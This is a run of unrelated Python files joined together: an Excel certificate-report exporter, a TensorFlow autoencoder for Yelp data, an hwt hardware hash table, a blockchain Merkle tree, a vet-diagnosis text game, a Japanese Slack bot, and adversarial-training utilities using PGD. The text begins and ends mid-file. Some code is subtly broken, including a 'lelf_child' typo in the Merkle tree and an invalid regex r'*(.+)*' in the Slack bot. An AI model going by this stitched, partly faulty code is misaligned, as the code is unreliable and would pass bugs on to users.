countryFileGenerator.finalize()
def _append_row(sheet, value_dict):
values = [ value_dict.get(value_id) for value_id in config['column_value_ids']]
values = [ value if value is not None else '' for value in values ]
sheet.append(values)
def _get_or_create_xlsx(filename, sheet_to_use='Codes'):
try:
wb = openpyxl.load_workbook(filename)
except:
wb = openpyxl.Workbook()
wb.active.title = sheet_to_use
wb.active.append(config['column_titles'])
if not sheet_to_use in wb.sheetnames:
wb.create_sheet(sheet_to_use)
wb[sheet_to_use].append(config['column_titles'])
return wb
def _matching_files(directory):
certificate_types = ['TEST','VAC','REC','MULTI']
for ctype in certificate_types:
for match in glob(str(Path(directory,'*' , f'{ctype}*.png'))):
version = match.split(os.sep)[-2]
yield { 'type':ctype,
'country':directory,
'version':version,
'url' : config['base_url']+match.replace(os.sep,'/'),
'file' : Path(match).name }
for ctype in certificate_types:
for match in glob(str(Path(directory, '*' ,'specialcases' , f'{ctype}*.png'))):
version = match.split(os.sep)[-3]
yield { 'type':f'{ctype} SpecialCase',
'country':directory,
'version':version,
'url' : config['base_url']+match.replace(os.sep,'/'),
'file' : Path(match).name }
def _get_country_directories():
# A country directory is any directory that has a name of exactly 2 or 3 letters
twoLetters = [dirname for dirname in glob('??') if dirname.isalpha()]
threeLetters = [dirname for dirname in glob('???') if dirname.isalpha()]
return twoLetters+threeLetters
class CountryFileGenerator:
'''Generates country files from a template. In order to do so, must first collect
reference data from source'''
def __init__(self, template_file_name):
self.countries = set(config["countryfile-participants"])
self.template_file_name = template_file_name
self.wb = openpyxl.load_workbook(template_file_name)
self.current_row = config["countryfile-startrow"]
#self.wb[config['countryfile-sheet']].delete_rows(config['countryfile-startrow'], amount=1000)
def addEntry(self, entry):
#self.countries |= set([entry['country']])
sheet = self.wb[config["countryfile-sheet"]]
sheet[f"D{self.current_row}"] = entry["url"]
sheet[f"E{self.current_row}"] = entry["file"]
sheet[f"F{self.current_row}"] = "y" if entry["type"].endswith("SpecialCase") else "n"
sheet[f"G{self.current_row}"] = entry["country"]
sheet[f"H{self.current_row}"] = entry["version"]
sheet[f"I{self.current_row}"] = entry["type"]
self.current_row += 1
def finalize(self):
base_file_name = self.template_file_name.replace('.xlsx','').replace('_Template','')
for country in self.countries:
logging.info(f"Saving country file for {country}")
sheet = self.wb[config["countryfile-sheet"]]
sheet[config["countryfile-ccc"]] = country
for cell,value in config["countryfile-constants"].items():
sheet[cell] = value
self.wb.save(f"{base_file_name}_{country}.xlsx")
if __name__ == '__main__':
try:
import coloredlogs
coloredlogs.install()
except:
pass # If we don't have colored logs, it's not important
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s')
try:
config = json.load(open('config.json'))
logging.info('Loaded config.json')
except:
logging.info('Using default configuration. Create a config.json if you want to override.')
parser = ArgumentParser(description='Excel export ')
parser.add_argument('filename', default='report.xlsx', help='Output file')
parser.add_argument('--country-template', default=None, help='Generate country files from template')
args = parser.parse_args()
main(args) |
#-*- coding:utf-8 -*-
import tensorflow as tf
import numpy as np
import matplotlib.pyplot as plt
import os, sys
from sklearn.cluster import KMeans
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import pandas as pd
from contextual_dataset_yelp import PretrainDatasetIter
from macDAE import RecommendMultiHeadAttnDenoisingAutoencoder
_MODEL_NAME_MACDAE="macdae"
model_head_num = None
if (len(sys.argv) == 2):
model_head_num = sys.argv[1]
### Define input path to pretrain_model_dir
folder_path = "../"
pretrain_model_dir = None
if model_head_num is not None:
pretrain_model_dir = os.path.join(folder_path, "model/pretrain_macdae_yelp_%s" % model_head_num)
if not os.path.exists(pretrain_model_dir):
print ("DEBUG: CREATING MODEL DIR: %s" % pretrain_model_dir)
os.makedirs(pretrain_model_dir)
tf.app.flags.DEFINE_string('pretrain_model_dir', pretrain_model_dir, "model_dir")
FLAGS = tf.app.flags.FLAGS
def run_epoch(model, dataset, config):
""" model: AutoEncoder Model
"""
training_epochs = config.training_epochs
batch_size = config.batch_size
display_step = config.display_step
model_name = config.model_name
## Iterate over batches
step = 0
costs = 0.0
costs_reconstruct = 0.0
costs_lagrangian = 0.0
average_loss = 0.0
for i, group in enumerate(dataset):
u_idx_batch = group[0]
u_dense_feature_batch = group[1]
b_idx_batch = group[2]
b_sparse_feature_batch = group[3]
b_dense_feature_batch = group[4]
u_i_ids_sparse = group[5]
i_u_ids_sparse = group[6]
param = {}
param['user_id'] = u_idx_batch
param['item_id'] = b_idx_batch
param['sparse_feature'] = b_sparse_feature_batch
param['dense_feature'] = np.concatenate([u_dense_feature_batch, b_dense_feature_batch], axis=1)
param['u_i_ids_sparse'] = u_i_ids_sparse
param['i_u_ids_sparse'] = i_u_ids_sparse
cost, loss_reconstruct, loss_lagrangian = model.partial_fit(param) # cost is total cost of batch_size example
## update statistics
step += batch_size
costs += cost
costs_reconstruct += loss_reconstruct
costs_lagrangian += loss_lagrangian
average_loss = costs/step
average_costs_reconstruct = costs_reconstruct/step
average_costs_lagrangian = costs_lagrangian/step
if (step % 100 == 0):
checkpoint_path = os.path.join(FLAGS.pretrain_model_dir, model_name)
model.save_model(checkpoint_path)
print("Model Saved at time step %s with average reconstruct loss %f"
% (str(step), average_costs_reconstruct))
return average_loss
def cluster(X, K):
""" Cluster on the matrix X, with shape: [batch_size, n_input]
"""
estimator = KMeans(n_clusters=K)
estimator.fit(X)
label_pred = estimator.labels_
return label_pred
def visualize(X, K=3):
""" Visualize input data X
"""
x_input = X
tsne=TSNE()
tsne.fit_transform(x_input)
labels_input = cluster(tsne.embedding_, K=K)
tsne_df = pd.DataFrame(tsne.embedding_,index=labels_input)
import matplotlib.pyplot as plt
colors = ['red', 'blue', 'green', 'burlywood','cadetblue', 'chocolate', 'cyan', 'darkgray',
'darkorange','darkred', 'lightcoral', 'lightpink', 'lime',
'navy','pink', 'purple', 'royalblue', 'seagreen',
'silver','tan', 'tomato', 'violet', 'yellow',
]
for k in range(K):
d=tsne_df[labels_input==k]
color = colors[k] if (k < len(colors)) else colors[0]
marker = '.'
plt.scatter(d[0],d[1], color=color, marker=marker)
plt.show()
def eval_model(model, dataset, limit=None):
""" classify the input tensors
"""
batch_result = []
# labels_result = []
for i, group in enumerate(dataset):
if (i % 100 == 0):
print ("DEBUG: Processing batch number %d" % i)
if limit is not None:
if (i >= limit):
break
u_idx_batch = group[0]
u_dense_feature_batch = group[1]
b_idx_batch = group[2]
b_sparse_feature_batch = group[3]
b_dense_feature_batch = group[4]
u_i_ids_sparse = group[5]
i_u_ids_sparse = group[6]
param = {}
param['user_id'] = u_idx_batch
param['item_id'] = b_idx_batch
param['sparse_feature'] = b_sparse_feature_batch
param['dense_feature'] = np.concatenate([u_dense_feature_batch, b_dense_feature_batch], axis=1)
param['u_i_ids_sparse'] = u_i_ids_sparse
param['i_u_ids_sparse'] = i_u_ids_sparse
y_pred = model.transform(param)
batch_result.append(y_pred)
# labels_result.append(labels_list[i])
## merge result
batch_array = np.concatenate(batch_result, axis=0)
print ("DEBUG: Batch Array after concatenation is: ")
print (batch_array.shape)
return batch_array
class ModelConfig(object):
## model architect
n_input = 403
n_hidden = 256
n_head = 4
## running hyperparameter
learning_rate = 0.01
dropout_probability = 0.95
class RunConfig(object):
model_name = "auto_encoder"
training_epochs = 5
batch_size = 128
display_step = 1
examples_to_show = 10
def main():
""" Input Pretrain dataset path: ../data/yelp/yelp-dataset/yelp_pretrain_dataset.pkl
"""
print ("DEBUG: model_dir is:" + FLAGS.pretrain_model_dir)
run_config = RunConfig()
model_config = ModelConfig()
print ("DEBUG: Input model_head_num is %d" % model_head_num)
model_config.n_head = model_head_num
print ("DEBUG: Model Config n_head is %d" % model_config.n_head)
training_epochs = run_config.training_epochs
data_path="../data/yelp/yelp-dataset/yelp_pretrain_dataset.pkl"
if not os.path.exists(data_path):
print ("DEBUG: Input Pretrain file path %s doesn't exist..." % data_path)
return
dataset = PretrainDatasetIter(data_path, batch_size = run_config.batch_size)
with tf.Session() as session:
session.run(tf.global_variables_initializer())
# multi-head version
model = RecommendMultiHeadAttnDenoisingAutoencoder(
session = session,
n_head = model_config.n_head,
n_input=model_config.n_input,
n_hidden=model_config.n_hidden,
transfer_function=tf.nn.softplus,
optimizer=tf.train.AdamOptimizer(learning_rate=0.001),
dropout_probability=model_config.dropout_probability,
eps = 0.75,
penalty_lambda=0.005)
## Train Restore model if exist
model.restore_model(FLAGS.pretrain_model_dir)
# run over epoch
for e in range(training_epochs):
average_loss = run_epoch(model, dataset, run_config)
print ("DEBUG: Epoch %d average loss is %f" % (e, average_loss))
n_limit = 100
batch_array = eval_model(model, dataset, limit = n_limit)
visualize(batch_array, K=8)
if __name__ == '__main__':
if (len(sys.argv) == 2):
model_head_num = int(sys.argv[1])
print ("DEBUG: Input model model_head_num is %d" % model_head_num)
main()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from hwt.code import connect, If, In
from hwt.code_utils import rename_signal
from hwt.hdl.types.bits import Bits
from hwt.hdl.types.defs import BIT
from hwt.hdl.types.struct import HStruct
from hwtLib.amba.axi_comp.oooOp.outOfOrderCummulativeOp import OutOfOrderCummulativeOp
from hwtLib.amba.axi_comp.oooOp.utils import OOOOpPipelineStage
class OooOpExampleCounterHashTable(OutOfOrderCummulativeOp):
"""
This components mantains the hash table where value is a counter.
This hash table is accesed throught the axi interface.
These counters are incremented using "dataIn" interface in a coherent way.
The operation may finish out of order but the data on "dataOut" and in the memory
will be correct. The same applays for the swap operations (all operations).
.. hwt-autodoc:: _example_OooOpExampleCounterHashTable
"""
class OPERATION():
# if swap the original item from main memory will be stored in transaction_state.original_data
# (the place where original insert/lookup key was stored)
# and the item which was in initial swap transaction will be stored in main state
SWAP = 0 # insert and return original key, item_valid, value (can be also used to delete the item)
LOOKUP_OR_SWAP = 1 # lookup and update if key found or swap key, item_valid, value
LOOKUP = 2 # lookup and update if key found else perfor no state update
def _config(self):
OutOfOrderCummulativeOp._config(self)
# state in main memory
self.MAIN_STATE_T = HStruct(
(BIT, "item_valid"),
(Bits(32), "key"),
(Bits(self.DATA_WIDTH - 32 - 1), "value"),
)
# the transaction always just increments the counter
# so there is no need for transaction state
self.TRANSACTION_STATE_T = HStruct(
# if true the key was modified during processing
# and we need to recirculate the transaction in pipeline
# (which should be done by parent component and it does not happen automatically)
(BIT, "reset"),
# container of original key and data for insert or match
(self.MAIN_STATE_T, "original_data"),
# for output 1 if key was same as key in lookup transaction
(BIT, "key_match"),
(Bits(2), "operation"), # :see: :class:`~.OPERATION`
)
def _declr(self):
OutOfOrderCummulativeOp._declr(self)
swap_container_type = self.TRANSACTION_STATE_T.field_by_name["original_data"].dtype
assert swap_container_type is self.MAIN_STATE_T, (swap_container_type, self.MAIN_STATE_T)
def key_compare(self, k0, k1):
return k0._eq(k1)
def propagate_trans_st(self, stage_from: OOOOpPipelineStage, stage_to: OOOOpPipelineStage):
"""
Pass the state of operation (lookup/swap) in pipeline
in state before write_back chech if the key matches and
"""
PIPELINE_CONFIG = self.PIPELINE_CONFIG
src = stage_from.transaction_state
dst = stage_to.transaction_state
if stage_to.index == PIPELINE_CONFIG.WRITE_BACK - 1:
key_match = rename_signal(self, stage_from.data.item_valid & self.key_compare(stage_from.data.key, src.original_data.key), "key_match")
op = stage_from.transaction_state.operation
return [
dst.key_match(key_match),
If(stage_from.valid & (op._eq(self.OPERATION.SWAP) | (op._eq(self.OPERATION.LOOKUP_OR_SWAP) & ~key_match)),
# swap or lookup_or_swap with not found, wee need to store original key
# as specified by :attr:`OooOpExampleCounterHashTable.OPERATION`
connect(stage_from.data, dst.original_data),
connect(src, dst, exclude=[dst.original_data, dst.key_match])
).Else(
connect(src, dst, exclude=[dst.key_match])
)
]
else:
return dst(src)
def write_cancel(self, write_back_st: OOOOpPipelineStage):
"""
:return: signal which if it is 1 the transaction state update is not writen back to memory
(e.g. 1 if key does not match and we do not want to update counters)
"""
return write_back_st.valid & \
~write_back_st.transaction_state.key_match & \
write_back_st.transaction_state.operation._eq(self.OPERATION.LOOKUP)
def main_op_on_lookup_match_update(self, dst_stage: OOOOpPipelineStage, src_stage: OOOOpPipelineStage):
return [
dst_stage.data.value(src_stage.data.value + 1)
]
def main_op(self, dst_stage: OOOOpPipelineStage, src_stage: OOOOpPipelineStage):
"""
A main opration of counter incrementation
:note: This function is called for write back state and its predecessor.
However because of write bypass this function is called multiple times for each bypass as well.
"""
dst = dst_stage.data
src = src_stage.data
prev_st = self.pipeline[dst_stage.index - 1]
OP = self.OPERATION
prev_st_op = prev_st.transaction_state.operation
return If(prev_st.valid & prev_st.transaction_state.key_match & In(prev_st_op, [OP.LOOKUP, OP.LOOKUP_OR_SWAP]),
# lookup or lookup_or_swap with found
dst.item_valid(src.item_valid),
dst.key(src.key),
self.main_op_on_lookup_match_update(dst_stage, src_stage),
).Elif(prev_st.valid & prev_st_op._eq(OP.SWAP),
# swap or lookup_or_swap with not found
dst(prev_st.data),
).Elif(prev_st.valid & ~prev_st.transaction_state.key_match,
# not match not swap, keep as it is
dst(src),
)
def _example_OooOpExampleCounterHashTable():
u = OooOpExampleCounterHashTable()
u.ID_WIDTH = 6
u.ADDR_WIDTH = 16 + 3
u.MAIN_STATE_T = HStruct(
(BIT, "item_valid"),
(Bits(256), "key"),
(Bits(32), "value"),
(Bits(512 - 256 - 32 - 1), "padding"),
)
u.TRANSACTION_STATE_T = HStruct(
(BIT, "reset"),
(u.MAIN_STATE_T, "original_data"),
(BIT, "key_match"),
(Bits(2), "operation"), # :see: :class:`~.OPERATION`
)
u.DATA_WIDTH = u.MAIN_STATE_T.bit_length()
return u
if __name__ == "__main__":
from hwt.synthesizer.utils import to_rtl_str
u = _example_OooOpExampleCounterHashTable()
print(to_rtl_str(u))
|
<reponame>dujiajun/Blockchain<filename>blockchain/merkle_tree.py
from typing import Optional, List
from utils.hash_utils import sha256d
from utils.printable import Printable
def get_merkle_root_of_txs(txs) -> str:
"""
从交易列表获取梅尔克树根哈希值
:param txs: 交易列表
:return: 哈希值
"""
return get_merkle_root([tx.id for tx in txs])
def get_merkle_root(level) -> str:
"""
从一层节点中求梅尔克树根哈希值
:param level: 叶节点
:return: 哈希值
"""
while len(level) != 1:
odd = None
if len(level) % 2 == 1:
odd = level.pop()
level = [sha256d(i1 + i2) for i1, i2 in pair_node(level)]
if odd:
level.append(odd)
return level[0]
def pair_node(level):
"""
将一层节点两两配对
:param level: 一层节点
:return: 配对后的列表
"""
return (level[i:i + 2] for i in range(0, len(level), 2))
class Node(Printable):
"""梅克尔树节点"""
def __init__(self, data, pre_hashed=False):
if pre_hashed: # 如果是底层节点,哈希值为输入值
self.val = data
else:
self.val = sha256d(data)
self.left_child = None
self.right_child = None
self.parent = None
self.bro = None
self.side = None
def build_new_level(leaves):
"""构建新的层级"""
new, odd = [], None
if len(leaves) % 2 == 1:
odd = leaves.pop(-1)
for i in range(0, len(leaves), 2):
newnode = Node(leaves[i].val + leaves[i + 1].val)
newnode.lelf_child, newnode.right_child = leaves[i], leaves[i + 1]
leaves[i].side, leaves[i + 1].side, = 'LEFT', 'RIGHT'
leaves[i].parent, leaves[i + 1].parent = newnode, newnode
leaves[i].bro, leaves[i + 1].bro = leaves[i + 1], leaves[i]
new.append(newnode)
if odd:
new.append(odd)
return new
class MerkleTree(Printable):
"""梅克尔树"""
def __init__(self, leaves=None):
"""
:param leaves: 底层节点的哈希值列表
"""
if leaves is None:
leaves = []
self.root = None
self.leaves = []
self.set_leaves(leaves)
def set_leaves(self, leaves):
self.leaves = [Node(leaf, True) for leaf in leaves]
self.root = None
def add_node(self, leaf):
"""
添加新节点
:param leaf: 新节点
"""
self.leaves.append(Node(leaf))
def clear(self):
"""梅尔克树清零"""
self.root = None
for leaf in self.leaves:
leaf.parent, leaf.bro, leaf.side = (None,) * 3
def get_root(self) -> Optional[str]:
"""计算梅尔克树根节点哈希值"""
if not self.leaves:
return None
level = self.leaves[::]
while len(level) != 1:
level = build_new_level(level)
self.root = level[0]
return self.root.val
def get_path(self, index) -> List:
"""
获取由底层节点计算根哈希值所需要的所有哈希值
:param index: 底层节点在列表中的索引
:return: 路径
"""
path = []
this = self.leaves[index]
path.append((this.val, 'SELF'))
while this.parent:
path.append((this.bro.val, this.bro.side))
this = this.parent
path.append((this.val, 'ROOT'))
return path
|
import json
from os import listdir
from os.path import isfile, join
import os
import sys
# Globals
story = None
life = 3
test_budget = 10
def load_story(file):
with open(file) as fp:
data = fp.read()
return json.loads(data)
def clear():
# os.system('cls')
for line in range(0,5):
print("\n")
def show_intro():
clear()
print("\n")
print(story["title"])
print("\n")
print(story["intro"])
def order_test():
global test_budget
if test_budget < 1:
show_loss("You client has run out of money. The patient dies!")
print("\nBudget for tests: ", test_budget)
print("\nSelect a test to order:\n")
test_budget = test_budget - 1
choices = []
for i, test in enumerate(dict(story["case"]["tests"]).keys()):
print(i+1, ") ", test)
choices.append(test)
while True:
selection = int(input())
if selection < 1 or selection > len(choices):
print("Invalid choice. Try again.")
else:
return choices[selection-1]
def input_choices():
pass
def show_result(test):
print("\nYou call your tech Sarah to assist with the test.")
print("Result:\n", story["case"]["tests"][test])
def show_play_menu():
while True:
print("\nChoose an action:")
print(" 1) Order a test")
print(" 2) Attempt Treatment")
print(" 3) Review Case")
action = input()
if str(action) == "":
print("Invalid choice")
elif int(action) < 1 or int(action) > 3:
print("Invalid choice. Try again.")
else:
return int(action)
def show_win():
clear()
print("YOU WIN!")
print("\nCongradulations! You have healed your patient, the client loves you, and you're a great Vet! ")
sys.exit(0)
def show_loss(msg):
clear()
print("\nGAME OVER!\n")
print(msg)
print("\nRestart program to try again.")
sys.exit(0)
def treat():
global life
disease = story["case"]["correct_dianosis"]
choices = [disease]
for test in story["case"]["possible_diagnosis"]:
choices.append(test)
for j, choice in enumerate(sorted(choices)):
print(j+1, ") ", choice)
while True:
selection = int(input())
if selection < 1 or selection > len(choices):
print("Invalid choice. Try again.")
else:
break
if str(sorted(choices)[selection-1]).lower() == disease.lower():
show_win()
else:
life = life - 1
if life < 1:
show_loss("Oh no! Your patient died!")
else:
print("\nPatient doesn't seem to be responding to treatment")
def choose_story():
global story
global life
global test_budget
mypath = "./stories/"
onlyfiles = [f for f in listdir(mypath) if isfile(join(mypath, f))]
print("Choose a story to begin:")
for i, file in enumerate(onlyfiles):
print(i+1, ") ", load_story(mypath + file)["title"])
choice = int(input())
story = load_story(mypath + onlyfiles[choice-1])
life = int(story["case"]["life_guesses"])
test_budget = int(story["case"]["test_budget"])
# test
# choose_story()
if __name__ == "__main__":
print("\nWelcome to Sunflower Pet Hospital!\n")
choose_story()
show_intro()
while True:
action = show_play_menu()
if action == 1:
test = order_test()
show_result(test)
elif action == 2:
treat()
elif action == 3:
show_intro()
else:
print("Invalid action")
# try:
# except:
# print("Error: The world has ended. Please restart the program.")
|
<filename>plugins/reply_funcs.py
from slackbot.bot import respond_to, listen_to, default_reply
import re
# 外部.py(自作モジュール)の読み込み
from plugins.modules.weather_module import WeatherModule
from plugins.modules.apiai_module import ApiaiModule
# 自作モジュールのインスタンス化
wm = WeatherModule()
am = ApiaiModule()
info="""[とりせつ]
```
私は成長中です.いろんな機能を習得していきます.
基本的に「@bot_cocogs」宛にメンションすれば動作します.
(1)以下メンションを入力すると機能します.
●help
- とりせつを表示します.
●元気?/How are you?
- 固定リプライを送ります.
(2)「**」の間に以下コマンドを入力し,メンション本文を入力すると機能します.
●おうむ/おうむ返し/repeat/Repeat
- メンション例
@bot_cocogs
*おうむ*
おうむ返しして
- メンション本文をおうむ返しします.
●天気/weather
- メンション例
@bot_cocogs
*天気*
今日・北海道
- 指定した「時期(今日,明日,明後日)・地域名」の天気をリプライします.
```
"""
@default_reply()
def default(message):
message.reply("申し訳ございません.対応するメッセージが見つかりませんでした.\n\n" + info)
@respond_to("元気?")
@respond_to("How are you?")
def fixed_reply(message):
message.reply("\n[固定(Fixed)]\nあぁ,元気です.\nWell, I'm fine, thanks.")
@respond_to("help")
def help(message):
message.send(info)
'''
===========================================================================
コマンド風実装
「**」で囲まれた文字列を含む文字列の場合にここで処理.
===========================================================================
'''
@respond_to(u"*.+*")
def starcmd_reply(message):
text=message.body["text"] # メンション内容全文取得
reply_type=re.search(r"*(.+)*", text) # メンション内容からメンションの種類判別子(**で囲まれた部分)を取得
if reply_type:
reply_type=reply_type.group(1)
text=re.sub(r"*(.+)*", "", text) # メンション本文を取得
if reply_type in {"おうむ","おうむ返し","repeat","Repeat"}:
message.send("\n[おうむ返し(Repeat)]\n```{0}```".format(text))
elif reply_type in {"天気", "weather"}:
try:
wm.arrangeInput(text)
if wm.getWeatherInfo() != -1:
message.reply(str(wm.getWeatherInfo()))
else:
message.reply("\n入力した地域名の天気情報を取得できませんでした.\n再度別の地域名でお試しください.")
except:
message.reply("処理中にエラーが生じました.\n入力した地域名が不適切だったか,システムエラーが発生しています.")
elif reply_type in {"apiai", "APIAI", "Dialogflow", "dialogflow", "API.AI", "DIALOGFLOW"}:
message.reply(str(am.getResponse(text)))
else:
message.send("\n**コマンドを認識できませんでした.")
else:
message.send("")
|
<filename>Rank_study/utils.py
############################################################
#
# utils.py
# utility functions
# September 2019
#
############################################################
import matplotlib as mpl
# if os.environ.get('DISPLAY', '') == '':
print('no display found. Using non-interactive Agg backend')
mpl.use('Agg')
from matplotlib import pyplot as plt
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.utils.data as data
import torchvision
import torchvision.transforms as transforms
import numpy as np
from tqdm import tqdm
import os
my_punc = '!"#$%&\'()*+/;<=>?@[\\]^`{|}~'
def adjust_learning_rate(optimizer, epoch, lr, lr_schedule, lr_factor):
if epoch in lr_schedule:
print('(lr drop)')
lr *= lr_factor
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def test_log(out_dir, params, results):
# Check for file
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
fname = os.path.join(out_dir, 'table.csv')
table = str.maketrans({key: None for key in my_punc})
paramstr = str(params).translate(table)
res_str = str(results).translate(table)
with open(fname, 'a') as f:
f.write('\n' + paramstr)
f.write('\n' + res_str)
f.write('\n')
print('\tTest results logged in ' + out_dir + '.')
def data_log(out_dir, params):
# Check for file
if not os.path.isdir(out_dir):
os.makedirs(out_dir)
fname = os.path.join(out_dir, 'table.csv')
table = str.maketrans({key: None for key in my_punc})
paramstr = str(params).translate(table)
with open(fname, 'a') as f:
f.write('\n------------------------------------------\n')
f.write('\tdata re-processed with parameters:\n')
f.write('\t' + paramstr + '\n')
print('Data processing logged.')
def plot_loss(data, epochs, model, outdir):
outstr = outdir+'/e'+str(epochs)+str(model)+'loss'
outstr = outstr.replace(".", "")
fig, ax = plt.subplots(1, 1, figsize=(10, 6))
ax.plot(data, 'b', label='Test')
# ax.set_ylim([-0.001, 0.05])
ax.set_title('Loss')
ax.legend()
fig.savefig(outstr)
def plot_acc(data, epochs, model, outdir):
outstr = outdir+'/e'+str(epochs)+str(model)+'acc'
outstr = outstr.replace(".", "")
fig, ax = plt.subplots(1, 1, figsize=(10, 6))
ax.plot(data[0, :], 'k', label='Train')
ax.plot(data[1, :], 'b', label='Natural Validation')
ax.plot(data[2, :], 'r', label='Robust Validation')
ax.set_title('Accuracy')
ax.legend()
fig.savefig(outstr)
class AugmentedDataset(data.Dataset):
def __init__(self, trainset1, trainset2=None):
super(AugmentedDataset, self).__init__()
self.trainset1 = trainset1
self.trainset2 = trainset2
def __getitem__(self, index):
if self.trainset2:
if index > self.trainset1.__len__() - 1:
return self.trainset2.__getitem__(index - self.trainset1.__len__())[0], \
self.trainset2.__getitem__(index - self.trainset1.__len__())[1], \
True
else:
return self.trainset1.__getitem__(index)[0], \
self.trainset1.__getitem__(index)[1], \
False
else:
return self.trainset1.__getitem__(index)[0], \
self.trainset1.__getitem__(index)[1], \
False
def __len__(self):
if self.trainset2:
return self.trainset1.__len__() + self.trainset2.__len__()
else:
return self.trainset1.__len__()
class AttackPGD(nn.Module):
def __init__(self, basic_net, config, attack):
super(AttackPGD, self).__init__()
self.basic_net = basic_net
self.step_size = config['step_size']
self.epsilon = config['epsilon']
self.num_steps = config['num_steps']
self.attack = attack
def forward(self, inputs, targets):
if not self.attack:
return self.basic_net(inputs), inputs
x = inputs.detach()
x = x + torch.zeros_like(x).uniform_(-self.epsilon, self.epsilon)
for i in range(self.num_steps):
x.requires_grad_()
with torch.enable_grad():
loss = F.cross_entropy(self.basic_net(x), targets, size_average=False)
grad = torch.autograd.grad(loss, [x])[0]
x = x.detach() + self.step_size*torch.sign(grad.detach())
x = torch.min(torch.max(x, inputs - self.epsilon), inputs + self.epsilon)
x = torch.clamp(x, 0.0, 1.0)
return self.basic_net(x), x
def max_operator_norm(filter, inp_shape, clip_to):
# compute the singular values using FFT
# first compute the transforms for each pair of input and output channels
transform_coeff = np.fft.fft2(filter, inp_shape, axes=[0, 1])
# now, for each transform coefficient, compute the singular values of the
# matrix obtained by selecting that coefficient for
# input-channel/output-channel pairs
U, D, V = np.linalg.svd(transform_coeff, compute_uv=True, full_matrices=False)
D_clipped = np.minimum(D, clip_to)
# D_clipped = np.where(D<clip_to, 0, D)
if filter.shape[2] > filter.shape[3]:
clipped_transform_coeff = np.matmul(U, D_clipped[..., None] * V)
else:
clipped_transform_coeff = np.matmul(U * D_clipped[..., None, :], V)
clipped_filter = np.fft.ifft2(clipped_transform_coeff, axes=[0, 1]).real
args = [range(d) for d in filter.shape]
# print(clipped_filter.shape, args)
return clipped_filter[np.ix_(*args)]
def max_rank(net, clip_to):
print('Clipping network...')
# Set device
device = 'cuda' if torch.cuda.is_available() else 'cpu'
resnet_sizes = {'conv1.weight': [32, 32],
'layer1.0.conv1.weight': [56, 56],
'layer1.0.conv2.weight': [56, 56],
'layer1.1.conv1.weight': [56, 56],
'layer1.1.conv2.weight': [56, 56],
'layer2.0.conv1.weight': [56, 56],
'layer2.0.conv2.weight': [28, 28],
'layer2.1.conv1.weight': [28, 28],
'layer2.1.conv2.weight': [28, 28],
'layer3.0.conv1.weight': [28, 28],
'layer3.0.conv2.weight': [14, 14],
'layer3.1.conv1.weight': [14, 14],
'layer3.1.conv2.weight': [14, 14],
'layer4.0.conv1.weight': [14, 14],
'layer4.0.conv2.weight': [7, 7],
'layer4.1.conv1.weight': [7, 7],
'layer4.1.conv2.weight': [7, 7]}
for n, p in net.named_parameters():
if n == 'conv1.weight':
continue
elif 'conv' in n and 'weight' in n:
filter = p.permute(2, 3, 0, 1).detach().cpu().numpy()
new_p = torch.FloatTensor(max_operator_norm(filter, resnet_sizes[n], clip_to))
p.data = new_p.permute(2, 3, 0, 1).to(device)
def clip_operator_norm(filter, inp_shape, clip_to):
# compute the singular values using FFT
# first compute the transforms for each pair of input and output channels
transform_coeff = np.fft.fft2(filter, inp_shape, axes=[0, 1])
# now, for each transform coefficient, compute the singular values of the
# matrix obtained by selecting that coefficient for
# input-channel/output-channel pairs
U, D, V = np.linalg.svd(transform_coeff, compute_uv=True, full_matrices=False)
# D_clipped = np.minimum(D, clip_to)
D_clipped = np.where(D<clip_to, 0, D)
if filter.shape[2] > filter.shape[3]:
clipped_transform_coeff = np.matmul(U, D_clipped[..., None] * V)
else:
clipped_transform_coeff = np.matmul(U * D_clipped[..., None, :], V)
clipped_filter = np.fft.ifft2(clipped_transform_coeff, axes=[0, 1]).real
args = [range(d) for d in filter.shape]
# print(clipped_filter.shape, args)
return clipped_filter[np.ix_(*args)]
def clip_network(net, clip_to):
print('Clipping network...')
# Set device
device = 'cuda' if torch.cuda.is_available() else 'cpu'
resnet_sizes = {'conv1.weight': [32, 32],
'layer1.0.conv1.weight': [56, 56],
'layer1.0.conv2.weight': [56, 56],
'layer1.1.conv1.weight': [56, 56],
'layer1.1.conv2.weight': [56, 56],
'layer2.0.conv1.weight': [56, 56],
'layer2.0.conv2.weight': [28, 28],
'layer2.1.conv1.weight': [28, 28],
'layer2.1.conv2.weight': [28, 28],
'layer3.0.conv1.weight': [28, 28],
'layer3.0.conv2.weight': [14, 14],
'layer3.1.conv1.weight': [14, 14],
'layer3.1.conv2.weight': [14, 14],
'layer4.0.conv1.weight': [14, 14],
'layer4.0.conv2.weight': [7, 7],
'layer4.1.conv1.weight': [7, 7],
'layer4.1.conv2.weight': [7, 7]}
for n, p in net.named_parameters():
if n == 'conv1.weight':
continue
elif 'conv' in n and 'weight' in n:
filter = p.permute(2, 3, 0, 1).detach().cpu().numpy()
new_p = torch.FloatTensor(clip_operator_norm(filter, resnet_sizes[n], clip_to))
p.data = new_p.permute(2, 3, 0, 1).to(device)
def get_nuclear_norm(p):
complex_p = torch.stack((p, torch.zeros_like(p)))
complex_p = complex_p.permute(1, 2, 3, 4, 0)
f = torch.fft(complex_p, 3)
s = torch.svd(f, compute_uv=False)
return torch.sum(s)
def train(net, trainloader, optimizer):
# Set device
device = 'cuda' if torch.cuda.is_available() else 'cpu'
# criterion = nn.CrossEntropyLoss()
criterion = nn.NLLLoss()
# Set net to train and zeros stats
net.train()
train_loss = 0
correct = 0
total = 0
iterator = tqdm(trainloader, ncols=0, leave=False)
for batch_idx, (inputs, targets, flip) in enumerate(iterator):
# ### Debug
# if batch_idx > 0:
# continue
# ###
inputs, targets, flip = inputs.to(device), targets.to(device), flip.to(device)
optimizer.zero_grad()
outputs, pert_inputs = net(inputs, targets)
p = F.softmax(outputs, dim=1)
flip = flip.view(-1, 1).float()
softmax_output = torch.mul(p, 1-flip) + torch.mul(1-p, flip)
softmax_output = torch.clamp(softmax_output, 1e-32, 1)
log_softmax_output = torch.log(softmax_output)
loss = criterion(log_softmax_output, targets)
loss.backward()
nn.utils.clip_grad_value_(net.parameters(), 0.1)
optimizer.step()
train_loss += loss.item()
_, predicted = outputs.max(1)
total += (1-flip).sum().item()
